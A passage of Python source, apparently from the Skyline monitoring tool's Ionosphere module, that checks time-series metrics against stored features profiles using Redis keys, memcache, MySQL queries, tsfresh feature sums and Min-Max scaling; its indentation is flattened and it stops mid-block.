# Check the ionosphere_echo metric Redis keys to see which check
# to run, ionosphere or ionosphere_echo. If Ionosphere is busy,
# Ionosphere will alternate between normal Ionosphere features
# profiles (Mirage duration) and Ionosphere echo features
# profiles (FULL_DURATION) comparison.
echo_ionosphere_check_cache_key = 'ionosphere_echo.ionosphere.check.%s' % base_name
echo_ionosphere_check_key = False
try:
echo_ionosphere_check_key = self.redis_conn.get(echo_ionosphere_check_cache_key)
except Exception as e:
logger.error('error :: could not query Redis for cache_key: %s' % e)
echo_ionosphere_echo_check_cache_key = 'ionosphere_echo.echo.check.%s' % base_name
echo_ionosphere_echo_check_key = False
try:
echo_ionosphere_echo_check_key = self.redis_conn.get(echo_ionosphere_echo_check_cache_key)
except Exception as e:
logger.error('error :: could not query Redis for cache_key: %s' % e)
create_ionosphere_echo_check_key = False
remove_ionosphere_echo_check_key = False
# If neither the ionosphere nor the ionosphere_echo key exists
# only check ionosphere
if not echo_ionosphere_check_key:
if not echo_ionosphere_echo_check_key:
echo_check = False
logger.info('ionosphere_busy - only running normal Mirage feature profiles checks, skipping ionosphere_echo checks')
create_ionosphere_echo_check_key = echo_ionosphere_check_cache_key
# If the ionosphere_echo key exists only check ionosphere
if echo_ionosphere_echo_check_key:
echo_check = False
logger.info('ionosphere_busy - only running normal Mirage feature profiles checks, skipping ionosphere_echo checks')
create_ionosphere_echo_check_key = echo_ionosphere_check_cache_key
remove_ionosphere_echo_check_key = echo_ionosphere_echo_check_cache_key
# If the ionosphere key exists only check ionosphere_echo
if echo_ionosphere_check_key:
echo_check = True
logger.info('ionosphere_busy - skipping the normal Mirage feature profiles checks as run last time and running ionosphere_echo checks this time')
# Remove the Mirage features profile ids from fp_ids
fp_ids = []
logger.info('ionosphere_busy - removed %s Mirage feature profile ids from fp_ids' % str(fp_count))
create_ionosphere_echo_check_key = echo_ionosphere_echo_check_cache_key
remove_ionosphere_echo_check_key = echo_ionosphere_check_cache_key
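# Summary of the alternation logic above when ionosphere_busy is True
# (keys are per metric with a 300 second TTL):
#   neither key exists         -> run Mirage fps only, set the ionosphere key
#   ionosphere_echo key exists -> run Mirage fps only, swap the keys
#   ionosphere key exists      -> run echo fps only (fp_ids emptied), swap the keys
# so consecutive busy checks alternate between the Mirage duration and
# FULL_DURATION (echo) features profiles rather than running both.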
if remove_ionosphere_echo_check_key:
try:
self.redis_conn.delete(remove_ionosphere_echo_check_key)
logger.info(
'deleted Redis check key - %s' % (remove_ionosphere_echo_check_key))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: failed to delete Redis check key - %s' % (remove_ionosphere_echo_check_key))
if create_ionosphere_echo_check_key:
try:
key_created_at = int(time())
self.redis_conn.setex(
# @modified 20190412 - Task #2824: Test redis-py upgrade
# Task #2926: Update dependencies
# create_ionosphere_echo_check_key, 300, [key_created_at])
create_ionosphere_echo_check_key, 300, key_created_at)
logger.info(
'created Redis check key - %s' % (create_ionosphere_echo_check_key))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: failed to create Redis check key - %s' % (create_ionosphere_echo_check_key))
if echo_check:
try:
if fps_db_object:
for row in fps_db_object:
# @added 20201009 - Bug #3782: Exclude disabled echo features profile
if row['enabled'] != 1:
continue
if row['deleted'] == 1:
continue
if int(row['full_duration']) == int(settings.FULL_DURATION):
fp_ids.append(int(row['id']))
echo_fp_ids.append(int(row['id']))
logger.info('appending ionosphere_echo fp id %s matched full_duration of %s - %s' % (str(row['id']), str(settings.FULL_DURATION), base_name))
fp_count_with_echo = len(fp_ids)
echo_fp_count = len(echo_fp_ids)
if echo_fp_count == 0:
echo_check = False
if echo_fp_count > 0:
logger.info('added an additional %s echo fp ids for %s' % (str(echo_fp_count), base_name))
logger.info('determined a total of %s fp ids (incl. echo) for %s' % (str(fp_count_with_echo), base_name))
echo_calculated_feature_file = '%s/%s.echo.tsfresh.input.csv.features.transposed.csv' % (metric_training_data_dir, base_name)
if os.path.isfile(echo_calculated_feature_file):
logger.info('echo calculated features available - %s' % (echo_calculated_feature_file))
echo_calculated_feature_file_found = True
else:
use_context = 'ionosphere_echo_check'
f_calc = None
try:
fp_csv, successful, fp_exists, fp_id, log_msg, traceback_format_exc, f_calc = calculate_features_profile(skyline_app, metric_timestamp, base_name, use_context)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to calculate features')
if os.path.isfile(echo_calculated_feature_file):
logger.info('echo calculated features available - %s' % (echo_calculated_feature_file))
echo_calculated_feature_file_found = True
echo_calculated_features = []
if echo_calculated_feature_file_found:
try:
echo_calculated_features = get_calculated_features(echo_calculated_feature_file)
except:
# 20190412 - just for debug
logger.error(traceback.format_exc())
logger.error('error :: ionosphere_echo_check no echo_calculated_features were determined')
echo_calculated_features = False
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to process echo')
# Compare calculated features to feature values for each fp id
not_anomalous = False
if calculated_feature_file_found:
for fp_id in fp_ids:
if not metrics_id:
logger.error('error :: metric id not known')
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return False
# @added 20190404 - Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# If the Ionosphere features profile checks are approaching the
# ionosphere_max_runtime, skip the remaining checks.
time_now_check = int(time())
# Allow 5 seconds for layers checks to be done
max_runtime_tolereance = ionosphere_max_runtime - 5
running_for = time_now_check - check_process_start
if running_for >= max_runtime_tolereance:
logger.info('features profile checks have been running for %s seconds, the ionosphere_max_runtime is about to be breached, skipping remaining features profile checks' % str(running_for))
break
# @added 20190327 - Feature #2484: FULL_DURATION feature profiles
check_type = 'ionosphere'
if echo_check:
for echo_fp_id in echo_fp_ids:
if fp_id == echo_fp_id:
check_type = 'ionosphere_echo_check'
if check_type == 'ionosphere_echo_check':
if not echo_calculated_features:
continue
# @added 2018075 - Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
fp_checked += 1
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis set instead of Manager().list to reduce memory
# self.features_profiles_checked.append(fp_id)
redis_set = 'ionosphere.features_profiles_checked'
data = str(fp_id)
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
features_count = None
fp_features = []
# Get features for fp_id from z_fp_<metric_id> table where the
# features profile is the same full_duration
metric_fp_table = 'z_fp_%s' % str(metrics_id)
# @added 20170804 - Bug #2130: MySQL - Aborted_clients
# Set a conditional here to only get_an_engine if no engine, this
# is probably responsible for the Aborted_clients, as it would have
# left the acquired engine orphaned
# Testing on skyline-dev-3-40g-gra1 Fri Aug 4 16:08:14 UTC 2017
if not engine:
try:
engine, log_msg, trace = get_an_engine()
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get a MySQL engine for feature_id and values from %s' % metric_fp_table)
if not engine:
logger.error('error :: engine not obtained for feature_id and values from %s' % metric_fp_table)
# @added 20170809 - Task #2132: Optimise Ionosphere DB usage
# First check to determine if the fp_id has data in memcache
# before querying the database
fp_id_feature_values = None
if settings.MEMCACHE_ENABLED:
fp_id_feature_values_key = 'fp.id.%s.feature.values' % str(fp_id)
try:
# @modified 20191029 - Task #3304: py3 - handle pymemcache bytes not str
# fp_id_feature_values = self.memcache_client.get(fp_id_feature_values_key)
if python_version == 2:
fp_id_feature_values = self.memcache_client.get(fp_id_feature_values_key)
else:
fp_id_feature_values = self.memcache_client.get(fp_id_feature_values_key).decode('utf-8')
# if memcache does not have the key the response to the
# client is None, it does not raise an exception
except:
# @modified 20200501 - Branch #3262: py3
# This is not an error if the data does not exist in
# memcache, it can be expected not to exist in
# memcache if it has not been used in a while.
# logger.error('error :: failed to get %s from memcache' % fp_id_feature_values_key)
logger.info('did not get %s from memcache, will query DB' % fp_id_feature_values_key)
try:
self.memcache_client.close()
except:
# @modified 20170913 - Task #2160: Test skyline with bandit
# pass
logger.error('error :: failed to close memcache_client')
if fp_id_feature_values:
fp_features = literal_eval(fp_id_feature_values)
logger.info('using memcache %s key data' % fp_id_feature_values_key)
if not fp_features:
try:
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
stmt = 'SELECT feature_id, value FROM %s WHERE fp_id=%s' % (metric_fp_table, str(fp_id)) # nosec
connection = engine.connect()
for row in engine.execute(stmt):
fp_feature_id = int(row['feature_id'])
fp_value = float(row['value'])
fp_features.append([fp_feature_id, fp_value])
connection.close()
features_count = len(fp_features)
logger.info('determined %s features for fp_id %s' % (str(features_count), str(fp_id)))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine feature_id, value from %s' % metric_fp_table)
if fp_features and settings.MEMCACHE_ENABLED:
fp_id_feature_values_key = 'fp.id.%s.feature.values' % str(fp_id)
try:
self.memcache_client.set(fp_id_feature_values_key, fp_features)
logger.info('populated memcache %s key' % fp_id_feature_values_key)
except:
logger.error('error :: failed to set %s in memcache' % fp_id_feature_values_key)
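# Illustrative shape of the fp_features data cached above (hypothetical
# feature ids and values) - a list of [feature_id, value] pairs keyed in
# memcache as 'fp.id.<fp_id>.feature.values':
#   fp_features = [[1, 0.0], [2, 1054.75], [3, 0.3333], ...]
# These are compared below against the tsfresh features calculated for
# the current training data.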
# @added 20170809 - Task #2132: Optimise Ionosphere DB usage
if settings.MEMCACHE_ENABLED:
try:
self.memcache_client.close()
except:
# @modified 20170913 - Task #2160: Test skyline with bandit
# pass
logger.error('error :: failed to close memcache_client')
# @added 20170107 - Feature #1852: Ionosphere - features_profile matched graphite graphs
# Feature #1844: ionosphere_matched DB table
# Added the calculated features sum for verification purposes
all_calc_features_sum_list = []
# @added 20190327 - Feature #2484: FULL_DURATION feature profiles
if check_type == 'ionosphere':
use_calculated_features = calculated_features
if check_type == 'ionosphere_echo_check':
use_calculated_features = echo_calculated_features
# @modified 20190327 - Feature #2484: FULL_DURATION feature profiles
# Bifurcate for ionosphere_echo_check
# for feature_name, calc_value in calculated_features:
for feature_name, calc_value in use_calculated_features:
all_calc_features_sum_list.append(float(calc_value))
all_calc_features_sum = sum(all_calc_features_sum_list)
# Convert feature names in calculated_features to their id
logger.info('converting tsfresh feature names to Skyline feature ids')
calc_features_by_id = []
# @modified 20190327 - Feature #2484: FULL_DURATION feature profiles
# Bifurcate for ionosphere_echo_check
# for feature_name, calc_value in calculated_features:
for feature_name, calc_value in use_calculated_features:
for skyline_feature_id, name in TSFRESH_FEATURES:
if feature_name == name:
calc_features_by_id.append([skyline_feature_id, float(calc_value)])
# Determine what features each data has, extract only values for
# common features.
logger.info('determining common features')
relevant_fp_feature_values = []
relevant_calc_feature_values = []
for skyline_feature_id, calc_value in calc_features_by_id:
for fp_feature_id, fp_value in fp_features:
if skyline_feature_id == fp_feature_id:
relevant_fp_feature_values.append(fp_value)
relevant_calc_feature_values.append(calc_value)
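# Illustrative example of the common feature extraction above
# (hypothetical feature ids and values):
#   calc_features_by_id = [[1, 0.5], [2, 10.0], [4, 3.0]]
#   fp_features         = [[1, 0.6], [2, 9.0], [3, 7.0]]
#   common feature ids  = 1 and 2
#   relevant_fp_feature_values   = [0.6, 9.0]
#   relevant_calc_feature_values = [0.5, 10.0]
# Only the values of features present in both sets are summed and compared.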
# Determine the sum of each set
relevant_fp_feature_values_count = len(relevant_fp_feature_values)
relevant_calc_feature_values_count = len(relevant_calc_feature_values)
if relevant_fp_feature_values_count != relevant_calc_feature_values_count:
logger.error('error :: mismatch in number of common features')
logger.error('error :: relevant_fp_feature_values_count - %s' % str(relevant_fp_feature_values_count))
logger.error('error :: relevant_calc_feature_values_count - %s' % str(relevant_calc_feature_values_count))
continue
else:
logger.info('comparing on %s common features' % str(relevant_fp_feature_values_count))
if relevant_fp_feature_values_count == 0:
logger.error('error :: relevant_fp_feature_values_count is zero')
continue
# Determine the sum of each set
sum_fp_values = sum(relevant_fp_feature_values)
sum_calc_values = sum(relevant_calc_feature_values)
logger.info(
'sum of the values of the %s common features in features profile - %s' % (
str(relevant_fp_feature_values_count), str(sum_fp_values)))
logger.info(
'sum of the values of the %s common features in the calculated features - %s' % (
str(relevant_calc_feature_values_count), str(sum_calc_values)))
# Determine whether each set is positive or negative
# # if the same carry on
# # if both negative, make them both positive
# Sum fp values, sum calculated values - handle negatives like
# features_sum :: -3389570699080000.0000000000
fp_sum_array = [sum_fp_values]
calc_sum_array = [sum_calc_values]
percent_different = 100
sums_array = np.array([sum_fp_values, sum_calc_values], dtype=float)
try:
calc_percent_different = np.diff(sums_array) / sums_array[:-1] * 100.
percent_different = calc_percent_different[0]
logger.info('percent_different between common features sums - %s' % str(percent_different))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to calculate percent_different')
continue
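# Illustrative example of the percent_different calculation above
# (hypothetical sums):
#   sums_array = np.array([100.0, 95.0])
#   np.diff(sums_array) / sums_array[:-1] * 100. -> [-5.0]
#   percent_different = -5.0 (made absolute further down before it is
#   compared to the IONOSPHERE_FEATURES_PERCENT_SIMILAR threshold)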
almost_equal = None
try:
np.testing.assert_array_almost_equal(fp_sum_array, calc_sum_array)
almost_equal = True
except:
almost_equal = False
if almost_equal:
not_anomalous = True
# @modified 20170118 - Bug #1860: Debug learn not matched in ionosphere
# This broke it, no variable was interpolated
# logger.info('common features sums are almost equal, not anomalous' % str(relevant_fp_feature_values_count))
logger.info('common features sums are almost equal, not anomalous')
# @added 20161229 - Feature #1830: Ionosphere alerts
# Update the features profile checked count and time
logger.info('updating checked details in db for %s' % (str(fp_id)))
# update matched_count in ionosphere_table
checked_timestamp = int(time())
# @added 20170804 - Bug #2130: MySQL - Aborted_clients
# Set a conditional here to only get_an_engine if no engine, this
# is probably responsible for the Aborted_clients, as it would have
# left the acquired engine orphaned
# Testing on skyline-dev-3-40g-gra1 Fri Aug 4 16:08:14 UTC 2017
if not engine:
try:
engine, log_msg, trace = get_an_engine()
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get a MySQL engine to update checked details in db for %s' % (str(fp_id)))
if not engine:
logger.error('error :: engine not obtained to update checked details in db for %s' % (str(fp_id)))
try:
connection = engine.connect()
connection.execute(
ionosphere_table.update(
ionosphere_table.c.id == fp_id).
values(checked_count=ionosphere_table.c.checked_count + 1,
last_checked=checked_timestamp))
connection.close()
logger.info('updated checked_count for %s' % str(fp_id))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not update checked_count and last_checked for %s ' % str(fp_id))
# if diff_in_sums <= 1%:
if percent_different < 0:
new_pdiff = percent_different * -1
percent_different = new_pdiff
# @added 20190327 - Feature #2484: FULL_DURATION feature profiles
# Bifurcate for ionosphere_echo_check
if check_type == 'ionosphere':
use_percent_similar = float(settings.IONOSPHERE_FEATURES_PERCENT_SIMILAR)
if check_type == 'ionosphere_echo_check':
try:
use_percent_similar = float(settings.IONOSPHERE_ECHO_FEATURES_PERCENT_SIMILAR)
except:
use_percent_similar = 2.0
# @modified 20190327 - Feature #2484: FULL_DURATION feature profiles
# Bifurcate for ionosphere_echo_check
# if percent_different < settings.IONOSPHERE_FEATURES_PERCENT_SIMILAR:
if percent_different < use_percent_similar:
not_anomalous = True
# log
logger.info('not anomalous - features profile match - %s' % base_name)
logger.info(
'calculated features sum is within %s percent of fp_id %s, percent different %s, not anomalous' %
(str(use_percent_similar),
str(fp_id), str(percent_different)))
if check_type == 'ionosphere_echo_check':
logger.info('ionosphere_echo_check - not anomalous with fp id %s for %s' % (str(fp_id), base_name))
# @added 20180617 - Feature #2404: Ionosphere - fluid approximation
# Now if not matched use Min-Max scaling as per
# http://sebastianraschka.com/Articles/2014_about_feature_scaling.html#numpy
# Min-Max scale the fp time series z_ts_<metric_id> SELECT WHERE fp_id
# or from memcache to create minmax_fp_ts
# Min-Max scale the current time series to create minmax_anomalous_ts
# Create features profiles for minmax_fp_ts
# Create features profiles for minmax_anomalous_ts
try:
minmax_scaling_enabled = settings.IONOSPHERE_MINMAX_SCALING_ENABLED
except:
minmax_scaling_enabled = False
minmax_not_anomalous = False
minmax_check = False
minmax = 0
if not not_anomalous:
if minmax_scaling_enabled:
minmax_check = True
if added_by == 'ionosphere_learn' and minmax_check:
minmax_check = False
logger.info('ionosphere_learn job not minmax scaling')
if minmax_check:
logger.info('running minmax scaling')
# First check to determine if the z_ts_<metric_id> for the fp
# has data in memcache before querying the database
metric_fp_ts_table = 'z_ts_%s' % str(metrics_id)
fp_id_metric_ts = []
if settings.MEMCACHE_ENABLED:
# @added 20200421 - Task #3304: py3 - handle pymemcache bytes not str
# Explicitly set the fp_id_metric_ts_object so it
# always exists to be evaluated
fp_id_metric_ts_object = None
fp_id_metric_ts_key = 'fp.%s.%s.ts' % (str(fp_id), str(metrics_id))
try:
# @modified 20191029 - Task #3304: py3 - handle pymemcache bytes not str
# fp_id_metric_ts_object = self.memcache_client.get(fp_id_metric_ts_key)
if python_version == 2:
fp_id_metric_ts_object = self.memcache_client.get(fp_id_metric_ts_key)
else:
fp_id_metric_ts_object = self.memcache_client.get(fp_id_metric_ts_key).decode('utf-8')
# if memcache does not have the key the response to the
# client is None, it does not raise an exception
except:
# @modified 20200501 - Branch #3262: py3
# This is not an error if the data does not exist in
# memcache, it can be expected not to exist in
# memcache if it has not been used in a while.
# logger.error('error :: failed to get %s from memcache' % fp_id_metric_ts_key)
logger.info('did not get %s from memcache, will query DB' % fp_id_metric_ts_key)
try:
self.memcache_client.close()
except:
logger.error('error :: failed to close memcache_client')
if fp_id_metric_ts_object:
# @modified 20200421 - Task #3304: py3 - handle pymemcache bytes not str
# Wrapped in try and except
try:
fp_id_metric_ts = literal_eval(fp_id_metric_ts_object)
logger.info('used memcache %s key data to populate fp_id_metric_ts with %s data points' % (fp_id_metric_ts_key, str(len(fp_id_metric_ts))))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to literal_eval the fp_id_metric_ts_object in minmax_check')
fp_id_metric_ts = []
else:
logger.info('no memcache %s key data, will use database' % fp_id_metric_ts_key)
if not fp_id_metric_ts:
if LOCAL_DEBUG:
logger.debug('debug :: getting data from %s database table for fp id %s to populate the fp_id_metric_ts list' % (metric_fp_ts_table, str(fp_id)))
try:
stmt = 'SELECT timestamp, value FROM %s WHERE fp_id=%s' % (metric_fp_ts_table, str(fp_id)) # nosec
connection = engine.connect()
for row in engine.execute(stmt):
fp_id_ts_timestamp = int(row['timestamp'])
fp_id_ts_value = float(row['value'])
fp_id_metric_ts.append([fp_id_ts_timestamp, fp_id_ts_value])
connection.close()
values_count = len(fp_id_metric_ts)
logger.info('determined %s values for the fp_id time series %s for %s' % (str(values_count), str(fp_id), str(base_name)))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine timestamps and values from %s' % metric_fp_ts_table)
if fp_id_metric_ts and settings.MEMCACHE_ENABLED:
fp_id_metric_ts_key = 'fp.%s.%s.ts' % (str(fp_id), str(metrics_id))
try:
self.memcache_client.set(fp_id_metric_ts_key, fp_id_metric_ts)
logger.info('populated memcache %s key' % fp_id_metric_ts_key)
except:
logger.error('error :: failed to set %s in memcache' % fp_id_metric_ts_key)
try:
self.memcache_client.close()
except:
logger.error('error :: failed to close memcache_client')
# Get anomalous time series
anomalous_ts_values_count = 0
if fp_id_metric_ts:
anomalous_timeseries_not_defined = True
try:
test_anomalous_timeseries = anomalous_timeseries
if len(test_anomalous_timeseries) > 0:
anomalous_timeseries_not_defined = False
except:
logger.info('anomalous_timeseries is not defined loading from anomaly json')
timeseries_dir = base_name.replace('.', '/')
metric_data_dir = '%s/%s/%s' % (
settings.IONOSPHERE_DATA_FOLDER, metric_timestamp,
timeseries_dir)
anomaly_json = '%s/%s.json' % (metric_data_dir, base_name)
# @added 20190327 - Feature #2484: FULL_DURATION feature profiles
# Bifurcate for ionosphere_echo_check
if check_type == 'ionosphere_echo_check':
anomaly_json = redis_anomaly_json
if not echo_anomalous_timeseries:
try:
with open((redis_anomaly_json), 'r') as f:
raw_timeseries = f.read()
timeseries_array_str = str(raw_timeseries).replace('(', '[').replace(')', ']')
del raw_timeseries
echo_anomalous_timeseries = literal_eval(timeseries_array_str)
del timeseries_array_str
if len(echo_anomalous_timeseries) > 0:
logger.info('echo_anomalous_timeseries was populated from anomaly json %s with %s data points for creating the minmax_anomalous_ts' % (redis_anomaly_json, str(len(echo_anomalous_timeseries))))
else:
logger.error('error :: echo_anomalous_timeseries for minmax_anomalous_ts is not populated from anomaly json - %s' % redis_anomaly_json)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not create echo_anomalous_timeseries from anomaly json %s' % redis_anomaly_json)
else:
logger.info('echo_anomalous_timeseries has %s data points for creating the minmax_anomalous_ts' % (str(len(echo_anomalous_timeseries))))
# @modified 20190327 - Feature #2484: FULL_DURATION feature profiles
# if anomalous_timeseries_not_defined:
if anomalous_timeseries_not_defined and check_type == 'ionosphere':
try:
with open((anomaly_json), 'r') as f:
raw_timeseries = f.read()
timeseries_array_str = str(raw_timeseries).replace('(', '[').replace(')', ']')
del raw_timeseries
anomalous_timeseries = literal_eval(timeseries_array_str)
del timeseries_array_str
if len(anomalous_timeseries) > 0:
logger.info('anomalous_timeseries was populated from anomaly json %s with %s data points for creating the minmax_anomalous_ts' % (anomaly_json, str(len(anomalous_timeseries))))
else:
logger.error('error :: anomalous_timeseries for minmax_anomalous_ts is not populated from anomaly json - %s' % anomaly_json)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not create anomalous_timeseries from anomaly json %s' % anomaly_json)
else:
if check_type == 'ionosphere':
logger.info('anomalous_timeseries has %s data points for creating the minmax_anomalous_ts' % (str(len(anomalous_timeseries))))
# @added 20190327 - Feature #2484: FULL_DURATION feature profiles
if check_type == 'ionosphere':
use_anomalous_timeseries = anomalous_timeseries
if check_type == 'ionosphere_echo_check':
use_anomalous_timeseries = echo_anomalous_timeseries
anomalous_ts_values_count = len(use_anomalous_timeseries)
# @added 20180621 - Feature #2404: Ionosphere - fluid approximation
# Check ranges and only Min-Max scale if the 2 time series
# are similar in range
# @added 20180819 - Bug #2534: Ionosphere - fluid approximation - IONOSPHERE_MINMAX_SCALING_RANGE_TOLERANCE on low ranges
# TODO
try:
range_tolerance = settings.IONOSPHERE_MINMAX_SCALING_RANGE_TOLERANCE
except:
range_tolerance = 0.15
range_tolerance_percentage = range_tolerance * 100
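# Illustrative example of the range tolerance applied below (hypothetical
# values): with range_tolerance = 0.15 and min_fp_value = 100, the lower
# bound is int(100 - 15) = 85 and the upper bound is int(100 + 15) = 115,
# so an anomalous series minimum of 92 falls within range(85, 115) and the
# lower ranges are considered similar. The same test is applied to the
# maximum values.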
check_range = False
range_similar = False
if fp_id_metric_ts:
if anomalous_ts_values_count > 0:
check_range = True
lower_range_similar = False
upper_range_similar = False
if check_range:
try:
minmax_fp_values = [x[1] for x in fp_id_metric_ts]
min_fp_value = min(minmax_fp_values)
max_fp_value = max(minmax_fp_values)
except:
min_fp_value = False
max_fp_value = False
try:
minmax_anomalous_values = [x2[1] for x2 in use_anomalous_timeseries]
min_anomalous_value = min(minmax_anomalous_values)
max_anomalous_value = max(minmax_anomalous_values)
except:
min_anomalous_value = False
max_anomalous_value = False
lower_range_not_same = True
try:
try:
if int(min_fp_value) == int(min_anomalous_value):
lower_range_not_same = False
lower_range_similar = True
logger.info('min value of fp_id_metric_ts (%s) and anomalous_timeseries (%s) are the same' % (
str(min_fp_value), str(min_anomalous_value)))
except:
lower_range_not_same = True
if min_fp_value and min_anomalous_value and lower_range_not_same:
if int(min_fp_value) == int(min_anomalous_value):
lower_range_similar = True
logger.info('min value of fp_id_metric_ts (%s) and anomalous_timeseries (%s) are the same' % (
str(min_fp_value), str(min_anomalous_value)))
else:
lower_min_fp_value = int(min_fp_value - (min_fp_value * range_tolerance))
upper_min_fp_value = int(min_fp_value + (min_fp_value * range_tolerance))
if int(min_anomalous_value) in range(lower_min_fp_value, upper_min_fp_value):
lower_range_similar = True
logger.info('min value of fp_id_metric_ts (%s) and anomalous_timeseries (%s) are similar within %s percent of each other' % (
str(min_fp_value),
str(min_anomalous_value),
str(range_tolerance_percentage)))
if not lower_range_similar:
logger.info('lower range of fp_id_metric_ts (%s) and anomalous_timeseries (%s) are not similar' % (
str(min_fp_value), str(min_anomalous_value)))
upper_range_not_same = True
try:
if int(max_fp_value) == int(max_anomalous_value):
upper_range_not_same = False
upper_range_similar = True
logger.info('max value of fp_id_metric_ts (%s) and anomalous_timeseries (%s) are the same' % (
str(max_fp_value), str(max_anomalous_value)))
except:
upper_range_not_same = True
if max_fp_value and max_anomalous_value and lower_range_similar and upper_range_not_same:
# @added 20180717 - Task #2446: Optimize Ionosphere
# Feature #2404: Ionosphere - fluid approximation
# On low values such as 1 and 2, the range_tolerance
# should be adjusted to account for the very small
# range. TODO
lower_max_fp_value = int(max_fp_value - (max_fp_value * range_tolerance))
upper_max_fp_value = int(max_fp_value + (max_fp_value * range_tolerance))
if int(max_anomalous_value) in range(lower_max_fp_value, upper_max_fp_value):
upper_range_similar = True
logger.info('max value of fp_id_metric_ts (%s) and anomalous_timeseries (%s) are similar within %s percent of each other' % (
str(max_fp_value), str(max_anomalous_value),
str(range_tolerance_percentage)))
else:
logger.info('max value of fp_id_metric_ts (%s) and anomalous_timeseries (%s) are not similar' % (
str(max_fp_value), str(max_anomalous_value)))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not calculate range similarity with the current anomalous_timeseries and the fp id %s time series' % (str(fp_id)))
if lower_range_similar and upper_range_similar:
range_similar = True
else:
logger.info('the ranges of fp_id_metric_ts and anomalous_timeseries differ significantly - Min-Max scaling will be skipped')

minmax_fp_ts = []
# if fp_id_metric_ts:
if range_similar:
if LOCAL_DEBUG:
logger.debug('debug :: creating minmax_fp_ts from minmax scaled fp_id_metric_ts')
try:
minmax_fp_values = [x[1] for x in fp_id_metric_ts]
x_np = np.asarray(minmax_fp_values)
# Min-Max scaling
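# (x - min) / (max - min) maps the series onto the 0.0 to 1.0 range,
# e.g. values [10, 20, 30] scale to [0.0, 0.5, 1.0]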
np_minmax = (x_np - x_np.min()) / (x_np.max() - x_np.min())
for (ts, v) in zip(fp_id_metric_ts, np_minmax):
minmax_fp_ts.append([ts[0], v])
logger.info('minmax_fp_ts list populated with the minmax scaled time series with %s data points' % str(len(minmax_fp_ts)))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not minmax scale fp id %s time series for %s' % (str(fp_id), str(base_name)))
if not minmax_fp_ts:
logger.error('error :: minmax_fp_ts list not populated')
minmax_anomalous_ts = []
if minmax_fp_ts:
# Only process if they are approximately the same length
minmax_fp_ts_values_count = len(minmax_fp_ts)
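# The two series are only compared if their lengths differ by fewer
# than 14 data points, as the tsfresh feature sums are only
# meaningfully comparable when calculated over a similar number of
# data points.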
if minmax_fp_ts_values_count - anomalous_ts_values_count in range(-14, 14):
try:
minmax_anomalous_values = [x2[1] for x2 in use_anomalous_timeseries]
x_np = np.asarray(minmax_anomalous_values)
# Min-Max scaling
np_minmax = (x_np - x_np.min()) / (x_np.max() - x_np.min())
# Pair the scaled values with the timestamps from the anomalous
# time series itself so each scaled value keeps its own timestamp
for (ts, v) in zip(use_anomalous_timeseries, np_minmax):
minmax_anomalous_ts.append([ts[0], v])
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine np_minmax with current time series anomalous_timeseries and fp id %s time series' % (str(fp_id)))
if len(minmax_anomalous_ts) > 0:
logger.info('minmax_anomalous_ts is populated with %s data points' % str(len(minmax_anomalous_ts)))
else:
logger.error('error :: minmax_anomalous_ts is not populated')
else:
logger.info('minmax scaled check will be skipped - anomalous_ts_values_count is %s and minmax_fp_ts_values_count is %s' % (str(anomalous_ts_values_count), str(minmax_fp_ts_values_count)))
minmax_fp_ts_csv = '%s/fpid.%s.%s.minmax_fp_ts.tsfresh.input.std.csv' % (
settings.SKYLINE_TMP_DIR, str(fp_id), base_name)
minmax_fp_fname_out = minmax_fp_ts_csv + '.transposed.csv'
anomalous_ts_csv = '%s/%s.%s.minmax_anomalous_ts.tsfresh.std.csv' % (
settings.SKYLINE_TMP_DIR, metric_timestamp, base_name)
anomalous_fp_fname_out = anomalous_ts_csv + '.transposed.csv'
# @modified 20210101 - Task #3928: Update Skyline to use new tsfresh feature extraction method
# tsf_settings = ReasonableFeatureExtractionSettings()
# tsf_settings.disable_progressbar = True
minmax_fp_features_sum = None
minmax_fp_features_count = 0
minmax_anomalous_features_sum = None
minmax_anomalous_features_count = 0
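# If both Min-Max scaled series were created, the same features
# calculation path as the unscaled check is repeated below: each
# scaled series is written to a csv, tsfresh features are extracted
# and transposed, the feature values are summed and the two sums are
# then compared for their percentage difference.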
if minmax_anomalous_ts and minmax_fp_ts:
if LOCAL_DEBUG:
logger.debug('debug :: analyzing minmax_fp_ts and minmax_anomalous_ts')
if not os.path.isfile(minmax_fp_ts_csv):
if LOCAL_DEBUG:
logger.debug('debug :: creating %s from minmax_fp_ts' % minmax_fp_ts_csv)
datapoints = minmax_fp_ts
converted = []
for datapoint in datapoints:
try:
new_datapoint = [float(datapoint[0]), float(datapoint[1])]
converted.append(new_datapoint)
except: # nosec
continue
del datapoints
if LOCAL_DEBUG:
if len(converted) > 0:
logger.debug('debug :: converted is populated')
else:
logger.debug('debug :: error :: converted is not populated')
for ts, value in converted:
try:
utc_ts_line = '%s,%s,%s\n' % (base_name, str(int(ts)), str(value))
with open(minmax_fp_ts_csv, 'a') as fh:
fh.write(utc_ts_line)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not write to file %s' % (str(minmax_fp_ts_csv)))
del converted
else:
logger.info('file found %s, using for data' % minmax_fp_ts_csv)
if not os.path.isfile(minmax_fp_ts_csv):
logger.error('error :: file not found %s' % minmax_fp_ts_csv)
else:
logger.info('file exists to create the minmax_fp_ts data frame from - %s' % minmax_fp_ts_csv)
try:
